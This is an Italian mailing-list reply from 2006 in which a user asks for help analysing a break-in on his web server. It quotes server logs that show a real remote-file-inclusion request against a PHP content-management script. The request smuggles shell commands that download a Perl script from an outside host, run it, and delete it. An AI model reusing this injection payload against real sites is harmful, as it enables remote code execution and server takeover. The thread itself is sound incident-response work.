Il giorno gio, 11/05/2006 alle 20.14 +0200, Fabio Muzzi ha scritto:
> controlla bene l'access log nei tempi in cui hai trovato i problemi
> nell'error.log, perche` da li` capisci probabilmente quale script
> hanno bucato.
l'unico evento parallelo su i due log (e con codice 200 su access.log)
e' il seguente:
[error.log]
(09-05-2006)
--10:05:57-- http://www.freewebs.com/jo-ann/gif.txt
=> `gif.txt'
Resolving www.freewebs.com... 38.119.100.2
Connecting to www.freewebs.com[38.119.100.2]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17,327 [text/plain]
0K .......... ...... 100%
20.15 KB/s
10:05:59 (20.15 KB/s) - `gif.txt' saved [17327/17327]
sh: line 1: kill: ?: no such pid
sh: line 1: kill: R: no such pid
sh: line 1: kill: 0:28: no such pid
sh: line 1: kill: /tmp/sbin/elfp: no such pid
sh: line 1: curl: command not found
Can't open perl script "gif.txt": No such file or directory
[/error.log]
[access.log]
85.119.158.42 - - [09/May/2006:10:06:48 +0200]
"GET
/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebs.com/jo-ann/tools.gif?&cmd=cd%20/tmp/;curl%20-O%20http://www.freewebs.com/jo-ann/gif.txt;perl%20gif.txt;rm%20-rf%20gif*?
HTTP/1.0" 200 27356 "-" "Mozilla/5.0"
[/access.log]
anche se del file gift.txt non v'e' l'ombra
>
> Se ci sono buchi nell'access, allora sono diventati root,
> probabilmente... e nel caso sono peni aspri.
Non so se quanto detto sopra puo' bastare per avere accesso come root,
pero' ho trovato un file "Google Search.txt" in /var/www che mi farebbe
propendere per l'ipotesi peggiore.
Ciao
Filo
--
Filippo Biondi
[Ubuntu|Debian] GNU User
Linux Registered User #357105
Proud member of
.:ERLUG:.
no1984.org member - Stop TCG!
|
